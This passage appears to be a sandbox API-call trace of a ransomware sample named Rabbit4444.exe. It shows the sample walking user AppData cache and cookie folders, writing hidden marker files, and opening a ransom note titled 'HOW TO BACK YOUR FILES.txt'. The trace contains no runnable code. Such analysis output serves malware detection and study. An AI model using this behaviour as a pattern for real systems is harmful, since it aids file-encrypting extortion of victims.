lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0062.414] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.415] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.417] FlushFileBuffers (hFile=0x27c) returned 1 [0062.418] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.418] CloseHandle (hObject=0x27c) returned 1 [0062.419] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp") returned 89 [0062.419] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.419] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223eab9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee8698f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0062.419] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.419] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.419] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.419] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.419] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223eab9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee8698f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.419] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.419] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.419] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.419] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.419] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.419] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee8698f2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee8698f2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee8698f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.419] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.419] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.419] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee8698f2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee8698f2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee8698f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.419] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0062.420] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.420] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.420] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.420] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.420] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.421] CloseHandle (hObject=0x298) returned 1 [0062.421] CloseHandle (hObject=0x27c) returned 1 [0062.421] GetCurrentThreadId () returned 0xd98 [0062.421] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0062.421] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory" [0062.421] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116c70 | out: hHeap=0xe0000) returned 1 [0062.421] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0062.421] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory" [0062.421] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\" [0062.421] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0062.421] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.422] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.425] FlushFileBuffers (hFile=0x27c) returned 1 [0062.426] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.426] CloseHandle (hObject=0x27c) returned 1 [0062.426] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory") returned 96 [0062.426] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.426] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee8698f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.426] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.426] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.426] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.426] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.426] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee8698f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.426] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.427] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.427] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.427] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.427] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.427] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee8698f2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee8698f2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee88fb24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.427] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.427] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.427] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee8698f2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee8698f2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee88fb24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.427] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.427] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.427] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.427] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.427] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.428] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.428] CloseHandle (hObject=0x298) returned 1 [0062.428] CloseHandle (hObject=0x27c) returned 1 [0062.428] GetCurrentThreadId () returned 0xd98 [0062.428] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fc8 [0062.428] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies" [0062.428] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116ad0 | out: hHeap=0xe0000) returned 1 [0062.428] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fc0 | out: hHeap=0xe0000) returned 1 [0062.428] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies" [0062.428] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\" [0062.428] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0062.428] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.429] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.431] FlushFileBuffers (hFile=0x27c) returned 1 [0062.432] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.432] CloseHandle (hObject=0x27c) returned 1 [0062.433] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies") returned 96 [0062.433] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.433] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223d8d2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee88fb24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0062.433] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.433] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.433] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.433] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.433] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223d8d2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee88fb24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.433] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.433] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.433] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.433] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.433] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.433] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee88fb24, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee88fb24, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee88fb24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.433] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.433] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.433] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee88fb24, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee88fb24, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee88fb24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.433] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0062.433] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.433] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.434] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.434] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.434] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.434] CloseHandle (hObject=0x298) returned 1 [0062.435] CloseHandle (hObject=0x27c) returned 1 [0062.435] GetCurrentThreadId () returned 0xd98 [0062.435] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0062.435] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache" [0062.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0062.435] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache" [0062.435] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\" [0062.435] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0062.435] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.436] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.443] FlushFileBuffers (hFile=0x27c) returned 1 [0062.462] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.497] CloseHandle (hObject=0x27c) returned 1 [0062.499] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache") returned 94 [0062.499] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.499] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 